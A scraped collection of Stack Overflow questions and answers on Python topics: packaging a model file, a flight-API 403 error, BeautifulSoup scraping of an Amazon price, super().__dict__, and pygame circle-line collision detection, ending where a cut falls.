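Note that this only works if saved_models is importable as a subpackage (it needs its own __init__.py) and the model file is actually shipped with the distribution. A hedged setup.py sketch of the packaging side (names assumed from the layout above):
from setuptools import setup, find_packages

setup(
    name="my_package_name",
    packages=find_packages(),
    # Without this, the installed package would not contain
    # saved_models/november_model at all.
    package_data={"my_package_name.saved_models": ["november_model"]},
    include_package_data=True,
)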
| my own python package - problem with path to model | I published python package on pypi.org structure looks like this:
/my_package_name-0.0.1
-- README LICENSE ETC..
-- /my_package_name
-- __init__.py
-- train_model.py
-- predict.py
-- /saved_models
-- november_model
In predict.py I have function that loads model:
def my_function():
(some code...)
net.load_model('./saved_models/november_model')
When I'm trying to use the package:
from my_package.predict import my_function
my_function()
I get error that it can't see the model:
OSError: Unable to open file
(unable to open file: name = './saved_models/november_model',
errno = 2, error message = 'No such file or directory', flags = 0, o_flags = 0)
I tried also:
net.load_model('saved_models/november_model')
net.load_model('./saved_models/november_model')
net.load_model('../saved_models/november_model')
I can't figure out correct path
| [
"The solution was to use importlib.resources in predict.py:\ntry:\n import importlib.resources as pkg_resources\nexcept ImportError:\n # Try backported to PY<37 `importlib_resources`.\n import importlib_resources as pkg_resources\nfrom my_package import saved_models\n\nand instead of:\nnet.load_model('saved_models/november_model')\n\nI used:\nf = pkg_resources.open_text(saved_models, 'november_model')\nnet.load_model(f.name)\n\n"
] | [
1
] | [] | [] | [
"pypi",
"python"
] | stackoverflow_0074577307_pypi_python.txt |
Q:
API can't find my API key in header even though i included it
I'm trying to use the tequila API to retrieve flight prices but the server keeps returning this error:
Traceback (most recent call last):
File "C:\Users\Senna\Downloads\flight-deals-step-2-solution\flight-deals-step-2-solution\main.py", line 37, in <module>
flight = flight_search.check_flights(
File "C:\Users\Senna\Downloads\flight-deals-step-2-solution\flight-deals-step-2-solution\flight_search.py", line 54, in check_flights
response.raise_for_status()
File "C:\Users\Senna\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\requests\models.py", line 953, in raise_for_status
raise HTTPError(http_error_msg, response=self)
requests.exceptions.HTTPError: 403 Client Error: Forbidden for url: https://tequila-api.kiwi.com/v2/search?fly_from=AMS&fly_to=CDG&date_from=15%2F08%2F2021&date_to=10%2F02%2F2022&nights_in_dst_from=7&nights_in_dst_to=28&flight_type=round&one_for_city=1&max_stopovers=0&curr=GBP
Process finished with exit code 1
this is my code:
(method in class)
def check_flights(self, origin_city_code, destination_city_code, from_time, to_time):
headers = {"apikey": TEQUILA_API_KEY}
query = {
"fly_from": origin_city_code,
"fly_to": destination_city_code,
"date_from": from_time.strftime("%d/%m/%Y"),
"date_to": to_time.strftime("%d/%m/%Y"),
"nights_in_dst_from": 7,
"nights_in_dst_to": 28,
"flight_type": "round",
"one_for_city": 1,
"max_stopovers": 0,
"curr": "GBP"
}
response = requests.get(
url="https://tequila-api.kiwi.com/v2/search",
headers=headers,
params=query,
)
response.raise_for_status()
try:
data = response.json()["data"][0]
except IndexError:
print(f"No flights found for {destination_city_code}.")
return None
flight_data = FlightData(
price=data["price"],
origin_city=data["route"][0]["cityFrom"],
origin_airport=data["route"][0]["flyFrom"],
destination_city=data["route"][0]["cityTo"],
destination_airport=data["route"][0]["flyTo"],
out_date=data["route"][0]["local_departure"].split("T")[0],
return_date=data["route"][1]["local_departure"].split("T")[0]
)
print(f"{flight_data.destination_city}: £{flight_data.price}")
return flight_data
A:
I'm also doing the course and got absolutely train-wrecked by the header not being recognized.
After two hours of trying every possible solution to make the header reach the API, I realized that I had forgotten to format date_to in the correct string format.
So even though the API was telling me the header was not found, the issue was actually with one of my parameters.
So give it another go and check your code character by character against the API documentation; I am sure you will find a tiny typo or a wrongly formatted value somewhere, and your request will eventually go through.
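A minimal sketch of the kind of slip described above (my illustration, not the original poster's code), assuming from_time and to_time are datetime objects and that the API expects dd/mm/YYYY strings as in the question's query:
from datetime import datetime, timedelta

from_time = datetime.now() + timedelta(days=1)
to_time = from_time + timedelta(days=180)

query = {
    # both dates must be formatted strings; passing a raw datetime for
    # "date_to" (forgetting strftime) is the slip that produced the 403
    "date_from": from_time.strftime("%d/%m/%Y"),
    "date_to": to_time.strftime("%d/%m/%Y"),
}
print(query)  # e.g. {'date_from': '15/08/2021', 'date_to': '11/02/2022'}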
| API can't find my API key in header even though I included it | I'm trying to use the Tequila API to retrieve flight prices, but the server keeps returning this error:
Traceback (most recent call last):
File "C:\Users\Senna\Downloads\flight-deals-step-2-solution\flight-deals-step-2-solution\main.py", line 37, in <module>
flight = flight_search.check_flights(
File "C:\Users\Senna\Downloads\flight-deals-step-2-solution\flight-deals-step-2-solution\flight_search.py", line 54, in check_flights
response.raise_for_status()
File "C:\Users\Senna\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.9_qbz5n2kfra8p0\LocalCache\local-packages\Python39\site-packages\requests\models.py", line 953, in raise_for_status
raise HTTPError(http_error_msg, response=self)
requests.exceptions.HTTPError: 403 Client Error: Forbidden for url: https://tequila-api.kiwi.com/v2/search?fly_from=AMS&fly_to=CDG&date_from=15%2F08%2F2021&date_to=10%2F02%2F2022&nights_in_dst_from=7&nights_in_dst_to=28&flight_type=round&one_for_city=1&max_stopovers=0&curr=GBP
Process finished with exit code 1
this is my code:
(method in class)
def check_flights(self, origin_city_code, destination_city_code, from_time, to_time):
headers = {"apikey": TEQUILA_API_KEY}
query = {
"fly_from": origin_city_code,
"fly_to": destination_city_code,
"date_from": from_time.strftime("%d/%m/%Y"),
"date_to": to_time.strftime("%d/%m/%Y"),
"nights_in_dst_from": 7,
"nights_in_dst_to": 28,
"flight_type": "round",
"one_for_city": 1,
"max_stopovers": 0,
"curr": "GBP"
}
response = requests.get(
url="https://tequila-api.kiwi.com/v2/search",
headers=headers,
params=query,
)
response.raise_for_status()
try:
data = response.json()["data"][0]
except IndexError:
print(f"No flights found for {destination_city_code}.")
return None
flight_data = FlightData(
price=data["price"],
origin_city=data["route"][0]["cityFrom"],
origin_airport=data["route"][0]["flyFrom"],
destination_city=data["route"][0]["cityTo"],
destination_airport=data["route"][0]["flyTo"],
out_date=data["route"][0]["local_departure"].split("T")[0],
return_date=data["route"][1]["local_departure"].split("T")[0]
)
print(f"{flight_data.destination_city}: £{flight_data.price}")
return flight_data
| [
"Im also doing the course and got absolutely trainwrecked on the header not being recognized.\nAfter 2 hours of trying every possible solution to make the header reach the API I recognized that I forgot to format date_to in the correct string format.\nSo despite the API is giving me header not found the issue was with one of my parameters.\nSo just give it another go and check your code character by character against the API documentation and I am sure you will find a tiny bit that has a typo or wrong format and your request will eventually go through.\n"
] | [
0
] | [
"class FlightSearch:\n def __init__(self):\n self.code = {}\n\n def get_destination_code(self, city_name):\n location_endpoint = f\"{TEQUILA_ENDPOINT}/locations/query\"\n headers = {\"apikey\": TEQUILA_API_KEY}\n query = {\"term\": city_name, \"location_types\": \"city\"}\n response = requests.get(url=location_endpoint, headers=headers, params=query)\n results = response.json()[\"locations\"]\n code = results[0][\"code\"]\n return code\n\nI think this code missed an __init__ under the FlightSearch class. After adding this line, it worked.\n"
] | [
-1
] | [
"api",
"python"
] | stackoverflow_0068785225_api_python.txt |
Q:
Unable to get the price of a product on Amazon when using Beautiful Soup in python
I was trying to track the price of a product using Beautiful Soup, but whenever I run this code I get a 6-digit number, which I assume has something to do with reCAPTCHA. I have tried numerous times and checked the headers, the URL and the tags, but nothing seems to work.
from bs4 import BeautifulSoup
import requests
from os import environ
import lxml
headers = {
"User-Agent": environ.get("User-Agent"),
"Accept-Language": environ.get("Accept-Language")
}
amazon_link_address = "https://www.amazon.in/Razer-Basilisk-Wired-
Gaming-RZ01-04000100-R3M1/dp/B097F8H1MC/?
_encoding=UTF8&pd_rd_w=6H9OF&content-id=amzn1.sym.1f592895-6b7a-4b03-
9d72-1a40ea8fbeca&pf_rd_p=1f592895-6b7a-4b03-9d72-1a40ea8fbeca&pf_rd_r=1K6KK6W05VTADEDXYM3C&pd_rd_wg=IobLb&pd_rd_r=9fcac35b
-b484-42bf-ba79-a6fdd803abf8&ref_=pd_gw_ci_mcx_mr_hp_atf_m"
response = requests.get(url=amazon_link_address, headers=headers)
soup = BeautifulSoup(response.content, features="lxml").prettify()
price = soup.find("a-price-whole")
print(price)
A:
The "a-price-whole" class in inside the tags so BS4 is not able to find it. This solution worked for me, I just changed your "find" to a "find_all" and made it scan through all of the spans until you find the class you are searching for then used the iterator.get_text() to print the price. Hope this helps!
soup = BeautifulSoup(response.content, features="lxml")
price = soup.find_all("span")
for i in price:
try:
if i['class'] == ['a-price-whole']:
itemPrice = f"${str(i.get_text())[:-1]}"
break
except KeyError:
continue
print(itemPrice)
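A shorter variant (my sketch, not the answerer's code) reaches the same element directly with BeautifulSoup's class_ keyword instead of looping over every span:
soup = BeautifulSoup(response.content, features="lxml")

# find() can match a tag name together with a CSS class in one call
price_tag = soup.find("span", class_="a-price-whole")
if price_tag is not None:  # Amazon may serve a captcha page instead of the product
    # [:-1] drops the trailing separator character, mirroring the answer above
    print(f"${price_tag.get_text()[:-1]}")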
| Unable to get the price of a product on Amazon when using Beautiful Soup in python | I was trying to track the price of a product using Beautiful Soup, but whenever I run this code I get a 6-digit number, which I assume has something to do with reCAPTCHA. I have tried numerous times and checked the headers, the URL and the tags, but nothing seems to work.
from bs4 import BeautifulSoup
import requests
from os import environ
import lxml
headers = {
"User-Agent": environ.get("User-Agent"),
"Accept-Language": environ.get("Accept-Language")
}
amazon_link_address = "https://www.amazon.in/Razer-Basilisk-Wired-
Gaming-RZ01-04000100-R3M1/dp/B097F8H1MC/?
_encoding=UTF8&pd_rd_w=6H9OF&content-id=amzn1.sym.1f592895-6b7a-4b03-
9d72-1a40ea8fbeca&pf_rd_p=1f592895-6b7a-4b03-9d72-1a40ea8fbeca&pf_rd_r=1K6KK6W05VTADEDXYM3C&pd_rd_wg=IobLb&pd_rd_r=9fcac35b
-b484-42bf-ba79-a6fdd803abf8&ref_=pd_gw_ci_mcx_mr_hp_atf_m"
response = requests.get(url=amazon_link_address, headers=headers)
soup = BeautifulSoup(response.content, features="lxml").prettify()
price = soup.find("a-price-whole")
print(price)
| [
"The \"a-price-whole\" class in inside the tags so BS4 is not able to find it. This solution worked for me, I just changed your \"find\" to a \"find_all\" and made it scan through all of the spans until you find the class you are searching for then used the iterator.get_text() to print the price. Hope this helps!\n\n\nsoup = BeautifulSoup(response.content, features=\"lxml\")\n\nprice = soup.find_all(\"span\")\nfor i in price:\n try:\n if i['class'] == ['a-price-whole']:\n itemPrice = f\"${str(i.get_text())[:-1]}\"\n break\n except KeyError:\n continue\n\nprint(itemPrice)\n\n\n\n"
] | [
0
] | [] | [] | [
"amazon",
"bots",
"python",
"tracker",
"web_scraping"
] | stackoverflow_0074603033_amazon_bots_python_tracker_web_scraping.txt |
Q:
Why does super().__dict__ raise an AttributeError?
Why is this raising an AttributeError?
class A:
def f(self):
print(super().__dict__)
A().f() # raises AttributeError: 'super' object has no attribute '__dict__'
A:
super() delegates attribute access to the next class in the MRO. In this case, object is the implicit parent class. Instances of the object class do not have a __dict__ attribute:
object().__dict__ # raises AttributeError
However, instances of empty classes do have a __dict__ attribute, so if A inherits from an empty base class, no error is raised:
class Foo:
pass
class A(Foo):
def f(self):
print(super().__dict__)
A().f() # prints '{}'
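If the goal was just to inspect the instance's attributes (my note, not part of the answer above), vars() on the instance itself works regardless of the base class:
class A:
    def f(self):
        # instance attributes live on the instance, not on super();
        # vars(self) is equivalent to self.__dict__
        print(vars(self))

A().f()  # prints '{}'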
| Why does super().__dict__ raise an AttributeError? | Why is this raising an AttributeError?
class A:
def f(self):
print(super().__dict__)
A().f() # raises AttributeError: 'super' object has no attribute '__dict__'
| [
"super() delegates attribute access to the next class in MRO. In this case, object is an implicit parent class. Instances of object class do not contain the __dict__ attribute:\nobject().__dict__ # raises AttributeError\n\nHowever, instances of empty classes do contain the __dict__ attribute, so if A inherits from an empty base class, no error is raised:\nclass Foo:\n pass\n\n\nclass A(Foo):\n def f(self):\n print(super().__dict__)\n\nA().f() # prints '{}'\n\n"
] | [
0
] | [
"I think attribute error comes many times with no reason , it happened with me so many times ....\nThe Only solution is that this method is no longer usable try to go though docs or use another one .\n"
] | [
-3
] | [
"magic_methods",
"python",
"python_descriptors"
] | stackoverflow_0074603550_magic_methods_python_python_descriptors.txt |
Q:
Trajectory planning
I have a program that generates circles and lines, where the circles cannot collide with each other and the lines cannot collide with the circles. The problem is that it only draws one line but not the others. It does not raise any error, and no matter how much I think about it, I do not understand why. (I'm new to Python, so excuse me if the error is obvious.)
I tried removing the for loop from my CreaLin class, and it does generate the lines, but then they all collide with the circles. I also thought that the colisionL function could be the problem, since the method does not belong to the line class as such, but I need values from the circle class, so I don't know what another way to do it would be; I would like to know a method.
my code:
class CreaCir:
def __init__(self, figs):
self.figs = figs
def update(self):
if len(self.figs) <70:
choca = False
r = randint(5, 104)
x = randint(0, 600 + r)
y = randint(0, 400 + r)
creOne = Circulo(x, y, r)
for fig in (self.figs):
choca = creOne.colisionC(fig)
if choca == True:
break
if choca == False:
self.figs.append(creOne)
def dibujar(self, ventana):
pass
class CreaLin:
def __init__(self, lins):
self.lins = lins
def update(self):
if len(self.lins) <70:
choca = False
x = randint(0, 700)
y = randint(0, 500)
a = randint(0, 700)
b = randint(0, 500)
linOne = Linea(x, y, a, b)
for lin in (self.lins):
choca = linOne.colisionL(lin)
if choca == True:
break
if choca == False:
self.lins.append(linOne)
def dibujar(self, ventana):
pass
class Ventana:
def __init__(self, Ven_Tam= (700, 500)):
pg.init()
self.ven_tam = Ven_Tam
self.ven = pg.display.set_caption("Linea")
self.ven = pg.display.set_mode(self.ven_tam)
self.ven.fill(pg.Color('#404040'))
self.figs = []
self.lins = []
self.reloj = pg.time.Clock()
def check_events(self):
for event in pg.event.get():
if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE):
quit()
pg.display.flip()
def run(self):
cirCreater = CreaCir(self.figs)
linCreater = CreaLin(self.lins)
while True:
self.check_events()
cirCreater.update()
linCreater.update()
for fig in self.figs:
fig.dibujar(self.ven)
for lin in self.lins:
lin.dibujar(self.ven)
self.reloj.tick(60)
if __name__ == '__main__':
ven = Ventana()
ven.run()
my class Circulo:
class Circulo(PosGeo):
def __init__(self, x, y, r):
self.x = x
self.y = y
self.radio = r
self.cx = x+r
self.cy = y+r
def __str__(self):
return f"Circulo, (X: {self.x}, Y: {self.y}), radio: {self.radio}"
def dibujar(self, ventana):
pg.draw.circle(ventana, "white", (self.cx, self.cy), self.radio, 1)
pg.draw.line(ventana, "white", (self.cx+2, self.cy+2),(self.cx-2, self.cy-2))
pg.draw.line(ventana, "white", (self.cx-2, self.cy+2),(self.cx+2, self.cy-2))
def update(self):
pass
def colisionC(self, c2):
return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2))
def colisionL(self, L2):
l0 = [L2.x, L2.y]
l1 = [L2.a, L2.b]
cp = [self.cx, self.cy]
x1 = l0[0] - cp[0]
y1 = l0[1] - cp[1]
x2 = l1[0] - cp[0]
y2 = l1[1] - cp[1]
dx = x2 - x1
dy = y2 - y1
dr = sqrt(dx*dx + dy*dy)
D = x1 * y2 - x2 * y1
discriminant = self.radio*self.radio*dr*dr - D*D
if discriminant < 0:
return False
else:
return True
and finally my class line:
class Linea(PosGeo):
def __init__(self, x, y, a, b):
super().__init__(x, y)
self.x = x
self.y = y
self.a = a
self.b = b
def dibujar(self, ventana):
pg.draw.line(ventana, "#7B0000", (self.x, self.y), (self.a, self.b))
def update(self):
pass
def colisionL(self, l1):
pass
Result:
A:
You need to implement the colisionC and colisionL methods in Linea and Circulo. See Problem with calculating line intersections for the line-line intersection algorithm. When checking for collisions between lines and circles, in addition to checking for collisions between circles and infinite lines, you must also consider the beginning and end of the line segment:
class Linea:
# [...]
def colisionC(self, c2):
return c2.colisionL(self)
def colisionL(self, l1):
return Linea.intersect_line_line((self.x, self.y), (self.a, self.b), (l1.x, l1.y), (l1.a, l1.b))
def intersect_line_line(P0, P1, Q0, Q1):
d = (P1[0]-P0[0]) * (Q1[1]-Q0[1]) + (P1[1]-P0[1]) * (Q0[0]-Q1[0])
if d == 0:
return None
t = ((Q0[0]-P0[0]) * (Q1[1]-Q0[1]) + (Q0[1]-P0[1]) * (Q0[0]-Q1[0])) / d
u = ((Q0[0]-P0[0]) * (P1[1]-P0[1]) + (Q0[1]-P0[1]) * (P0[0]-P1[0])) / d
if 0 <= t <= 1 and 0 <= u <= 1:
return P1[0] * t + P0[0] * (1-t), P1[1] * t + P0[1] * (1-t)
return None
class Circulo
# [...]
def colisionC(self, c2):
return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2))
def colisionL(self, L2):
l0 = [L2.x, L2.y]
l1 = [L2.a, L2.b]
cp = [self.cx, self.cy]
x1 = l0[0] - cp[0]
y1 = l0[1] - cp[1]
x2 = l1[0] - cp[0]
y2 = l1[1] - cp[1]
if sqrt(x1*x1+y1*y1) < self.radio or sqrt(x2*x2+y2*y2) < self.radio:
return True
dx = x2 - x1
dy = y2 - y1
dr = sqrt(dx*dx + dy*dy)
D = x1 * y2 - x2 * y1
discriminant = self.radio*self.radio*dr*dr - D*D
if discriminant < 0:
return False
sign = lambda x: -1 if x < 0 else 1
xa = (D * dy + sign(dy) * dx * sqrt(discriminant)) / (dr * dr)
xb = (D * dy - sign(dy) * dx * sqrt(discriminant)) / (dr * dr)
ya = (-D * dx + abs(dy) * sqrt(discriminant)) / (dr * dr)
yb = (-D * dx - abs(dy) * sqrt(discriminant)) / (dr * dr)
ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr
tb = (xb-x1)*dx/dr + (yb-y1)*dy/dr
return 0 < ta < dr or 0 < tb < dr
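An alternative to the discriminant approach above (my sketch, not part of the original answer) is to project the circle center onto the segment and compare the distance of the closest point to the radius; it handles the segment endpoints in one step:
from math import hypot

def circle_segment_collision(cx, cy, r, x1, y1, x2, y2):
    dx, dy = x2 - x1, y2 - y1
    seg_len_sq = dx*dx + dy*dy
    if seg_len_sq == 0:                      # degenerate segment (a point)
        return hypot(cx - x1, cy - y1) < r
    # parameter of the projection of the center, clamped to the segment
    t = ((cx - x1)*dx + (cy - y1)*dy) / seg_len_sq
    t = max(0.0, min(1.0, t))
    px, py = x1 + t*dx, y1 + t*dy            # closest point on the segment
    return hypot(cx - px, cy - py) < r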
Put all objects into one container. Before you add a new Linea, you have to check whether the new line intersects any existing object with colisionL. Before you add a new Circulo, you must check whether the new circle intersects any existing object with colisionC:
class CreaObjects:
def __init__(self, figs):
self.figs = figs
self.no_lines = 0
self.no_circles = 0
def update(self):
if self.no_circles <70:
r = randint(5, 104)
creOne = Circulo(randint(0, 600 - 2*r), randint(0, 400 - 2*r), r)
if not any(fig.colisionC(creOne) for fig in self.figs):
self.figs.append(creOne)
self.no_circles += 1
if self.no_lines <70:
linOne = Linea(randint(0, 700), randint(0, 500), randint(0, 700), randint(0, 500))
if not any(fig.colisionL(linOne) for fig in self.figs):
self.figs.append(linOne)
self.no_lines += 1
Complete example:
import pygame as pg
from random import randint
from math import sqrt, hypot
class Linea:
def __init__(self, x, y, a, b):
self.x = x
self.y = y
self.a = a
self.b = b
def dibujar(self, ventana):
pg.draw.line(ventana, "#7B0000", (self.x, self.y), (self.a, self.b))
def update(self):
pass
def colisionC(self, c2):
return c2.colisionL(self)
def colisionL(self, l1):
return Linea.intersect_line_line((self.x, self.y), (self.a, self.b), (l1.x, l1.y), (l1.a, l1.b))
def intersect_line_line(P0, P1, Q0, Q1):
d = (P1[0]-P0[0]) * (Q1[1]-Q0[1]) + (P1[1]-P0[1]) * (Q0[0]-Q1[0])
if d == 0:
return None
t = ((Q0[0]-P0[0]) * (Q1[1]-Q0[1]) + (Q0[1]-P0[1]) * (Q0[0]-Q1[0])) / d
u = ((Q0[0]-P0[0]) * (P1[1]-P0[1]) + (Q0[1]-P0[1]) * (P0[0]-P1[0])) / d
if 0 <= t <= 1 and 0 <= u <= 1:
return P1[0] * t + P0[0] * (1-t), P1[1] * t + P0[1] * (1-t)
return None
class Circulo:
def __init__(self, x, y, r):
self.x = x
self.y = y
self.radio = r
self.cx = x+r
self.cy = y+r
def __str__(self):
return f"Circulo, (X: {self.x}, Y: {self.y}), radio: {self.radio}"
def dibujar(self, ventana):
pg.draw.circle(ventana, "white", (self.cx, self.cy), self.radio, 1)
pg.draw.line(ventana, "white", (self.cx+2, self.cy+2),(self.cx-2, self.cy-2))
pg.draw.line(ventana, "white", (self.cx-2, self.cy+2),(self.cx+2, self.cy-2))
def update(self):
pass
def colisionC(self, c2):
return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2))
def colisionL(self, L2):
l0 = [L2.x, L2.y]
l1 = [L2.a, L2.b]
cp = [self.cx, self.cy]
x1 = l0[0] - cp[0]
y1 = l0[1] - cp[1]
x2 = l1[0] - cp[0]
y2 = l1[1] - cp[1]
if sqrt(x1*x1+y1*y1) < self.radio or sqrt(x2*x2+y2*y2) < self.radio:
return True
dx = x2 - x1
dy = y2 - y1
dr = sqrt(dx*dx + dy*dy)
D = x1 * y2 - x2 * y1
discriminant = self.radio*self.radio*dr*dr - D*D
if discriminant < 0:
return False
sign = lambda x: -1 if x < 0 else 1
xa = (D * dy + sign(dy) * dx * sqrt(discriminant)) / (dr * dr)
xb = (D * dy - sign(dy) * dx * sqrt(discriminant)) / (dr * dr)
ya = (-D * dx + abs(dy) * sqrt(discriminant)) / (dr * dr)
yb = (-D * dx - abs(dy) * sqrt(discriminant)) / (dr * dr)
ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr
tb = (xb-x1)*dx/dr + (yb-y1)*dy/dr
return 0 < ta < dr or 0 < tb < dr
class CreaObjects:
def __init__(self, figs):
self.figs = figs
self.no_lines = 0
self.no_circles = 0
def update(self):
if self.no_circles <70:
r = randint(5, 104)
creOne = Circulo(randint(0, 600 - 2*r), randint(0, 400 - 2*r), r)
if not any(fig.colisionC(creOne) for fig in self.figs):
self.figs.append(creOne)
self.no_circles += 1
if self.no_lines <70:
linOne = Linea(randint(0, 700), randint(0, 500), randint(0, 700), randint(0, 500))
if not any(fig.colisionL(linOne) for fig in self.figs):
self.figs.append(linOne)
self.no_lines += 1
class Ventana:
def __init__(self, Ven_Tam= (700, 500)):
pg.init()
self.ven_tam = Ven_Tam
self.ven = pg.display.set_caption("Linea")
self.ven = pg.display.set_mode(self.ven_tam)
self.figs = []
self.reloj = pg.time.Clock()
def check_events(self):
for event in pg.event.get():
if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE):
quit()
def run(self):
cirCreater = CreaObjects(self.figs)
while True:
self.check_events()
cirCreater.update()
self.ven.fill(pg.Color('#404040'))
for fig in self.figs:
fig.dibujar(self.ven)
pg.display.flip()
self.reloj.tick(60)
if __name__ == '__main__':
ven = Ventana()
ven.run()
| Trajectory planning | I have a program that generates circles and lines, where the circles cannot collide with each other and the lines cannot collide with the circles. The problem is that it only draws one line but not the others. It does not raise any error, and no matter how much I think about it, I do not understand why. (I'm new to Python, so excuse me if the error is obvious.)
I tried removing the for loop from my CreaLin class, and it does generate the lines, but then they all collide with the circles. I also thought that the colisionL function could be the problem, since the method does not belong to the line class as such, but I need values from the circle class, so I don't know what another way to do it would be; I would like to know a method.
my code:
class CreaCir:
def __init__(self, figs):
self.figs = figs
def update(self):
if len(self.figs) <70:
choca = False
r = randint(5, 104)
x = randint(0, 600 + r)
y = randint(0, 400 + r)
creOne = Circulo(x, y, r)
for fig in (self.figs):
choca = creOne.colisionC(fig)
if choca == True:
break
if choca == False:
self.figs.append(creOne)
def dibujar(self, ventana):
pass
class CreaLin:
def __init__(self, lins):
self.lins = lins
def update(self):
if len(self.lins) <70:
choca = False
x = randint(0, 700)
y = randint(0, 500)
a = randint(0, 700)
b = randint(0, 500)
linOne = Linea(x, y, a, b)
for lin in (self.lins):
choca = linOne.colisionL(lin)
if choca == True:
break
if choca == False:
self.lins.append(linOne)
def dibujar(self, ventana):
pass
class Ventana:
def __init__(self, Ven_Tam= (700, 500)):
pg.init()
self.ven_tam = Ven_Tam
self.ven = pg.display.set_caption("Linea")
self.ven = pg.display.set_mode(self.ven_tam)
self.ven.fill(pg.Color('#404040'))
self.figs = []
self.lins = []
self.reloj = pg.time.Clock()
def check_events(self):
for event in pg.event.get():
if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE):
quit()
pg.display.flip()
def run(self):
cirCreater = CreaCir(self.figs)
linCreater = CreaLin(self.lins)
while True:
self.check_events()
cirCreater.update()
linCreater.update()
for fig in self.figs:
fig.dibujar(self.ven)
for lin in self.lins:
lin.dibujar(self.ven)
self.reloj.tick(60)
if __name__ == '__main__':
ven = Ventana()
ven.run()
my class Circulo:
class Circulo(PosGeo):
def __init__(self, x, y, r):
self.x = x
self.y = y
self.radio = r
self.cx = x+r
self.cy = y+r
def __str__(self):
return f"Circulo, (X: {self.x}, Y: {self.y}), radio: {self.radio}"
def dibujar(self, ventana):
pg.draw.circle(ventana, "white", (self.cx, self.cy), self.radio, 1)
pg.draw.line(ventana, "white", (self.cx+2, self.cy+2),(self.cx-2, self.cy-2))
pg.draw.line(ventana, "white", (self.cx-2, self.cy+2),(self.cx+2, self.cy-2))
def update(self):
pass
def colisionC(self, c2):
return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2))
def colisionL(self, L2):
l0 = [L2.x, L2.y]
l1 = [L2.a, L2.b]
cp = [self.cx, self.cy]
x1 = l0[0] - cp[0]
y1 = l0[1] - cp[1]
x2 = l1[0] - cp[0]
y2 = l1[1] - cp[1]
dx = x2 - x1
dy = y2 - y1
dr = sqrt(dx*dx + dy*dy)
D = x1 * y2 - x2 * y1
discriminant = self.radio*self.radio*dr*dr - D*D
if discriminant < 0:
return False
else:
return True
and finally my class line:
class Linea(PosGeo):
def __init__(self, x, y, a, b):
super().__init__(x, y)
self.x = x
self.y = y
self.a = a
self.b = b
def dibujar(self, ventana):
pg.draw.line(ventana, "#7B0000", (self.x, self.y), (self.a, self.b))
def update(self):
pass
def colisionL(self, l1):
pass
Result:
| [
"You need to implement the colisionC and colisionL methods in Linea and Circulo. See Problem with calculating line intersections for the line-line intersection algorithm. When checking for collisions between lines and circles, in addition to checking for collisions between circles and endless lines, you must also consider the beginning and end of the line segment:\nclass Linea:\n # [...]\n\n def colisionC(self, c2):\n return c2.colisionL(self)\n \n def colisionL(self, l1):\n return Linea.intersect_line_line((self.x, self.y), (self.a, self.b), (l1.x, l1.y), (l1.a, l1.b))\n \n def intersect_line_line(P0, P1, Q0, Q1): \n d = (P1[0]-P0[0]) * (Q1[1]-Q0[1]) + (P1[1]-P0[1]) * (Q0[0]-Q1[0]) \n if d == 0:\n return None\n t = ((Q0[0]-P0[0]) * (Q1[1]-Q0[1]) + (Q0[1]-P0[1]) * (Q0[0]-Q1[0])) / d\n u = ((Q0[0]-P0[0]) * (P1[1]-P0[1]) + (Q0[1]-P0[1]) * (P0[0]-P1[0])) / d\n if 0 <= t <= 1 and 0 <= u <= 1:\n return P1[0] * t + P0[0] * (1-t), P1[1] * t + P0[1] * (1-t)\n return None\n\nclass Circulo\n # [...]\n\n def colisionC(self, c2):\n return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2))\n \n def colisionL(self, L2):\n l0 = [L2.x, L2.y]\n l1 = [L2.a, L2.b]\n cp = [self.cx, self.cy]\n x1 = l0[0] - cp[0]\n y1 = l0[1] - cp[1]\n x2 = l1[0] - cp[0]\n y2 = l1[1] - cp[1]\n if sqrt(x1*x1+y1*y1) < self.radio or sqrt(x2*x2+y2*y2) < self.radio:\n return True\n\n dx = x2 - x1\n dy = y2 - y1\n dr = sqrt(dx*dx + dy*dy)\n D = x1 * y2 - x2 * y1\n discriminant = self.radio*self.radio*dr*dr - D*D\n if discriminant < 0:\n return False\n \n sign = lambda x: -1 if x < 0 else 1\n xa = (D * dy + sign(dy) * dx * sqrt(discriminant)) / (dr * dr)\n xb = (D * dy - sign(dy) * dx * sqrt(discriminant)) / (dr * dr)\n ya = (-D * dx + abs(dy) * sqrt(discriminant)) / (dr * dr)\n yb = (-D * dx - abs(dy) * sqrt(discriminant)) / (dr * dr)\n ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr\n tb = (xb-x1)*dx/dr + (yb-y1)*dy/dr\n return 0 < ta < dr or 0 < tb < dr\n\nPut all objects into one container. Before you add a new Linea you have to check if the new \"Line\" intersects another object with \"ColisionL\". 
Before you add a new Circulo, you must check if the new \"Line\" intersects another object with CollisionC:\nclass CreaObjects:\n def __init__(self, figs):\n self.figs = figs\n self.no_lines = 0\n self.no_circles = 0\n \n def update(self):\n if self.no_circles <70:\n r = randint(5, 104)\n creOne = Circulo(randint(0, 600 - 2*r), randint(0, 400 - 2*r), r)\n if not any(fig.colisionC(creOne) for fig in self.figs):\n self.figs.append(creOne)\n self.no_circles += 1\n \n if self.no_lines <70:\n linOne = Linea(randint(0, 700), randint(0, 500), randint(0, 700), randint(0, 500))\n if not any(fig.colisionL(linOne) for fig in self.figs):\n self.figs.append(linOne)\n self.no_lines += 1 \n\n\nComplete example:\n\nimport pygame as pg\nfrom random import randint\nfrom math import sqrt, hypot\n\nclass Linea:\n def __init__(self, x, y, a, b):\n self.x = x\n self.y = y\n self.a = a\n self.b = b\n\n def dibujar(self, ventana):\n pg.draw.line(ventana, \"#7B0000\", (self.x, self.y), (self.a, self.b))\n\n def update(self):\n pass\n\n def colisionC(self, c2):\n return 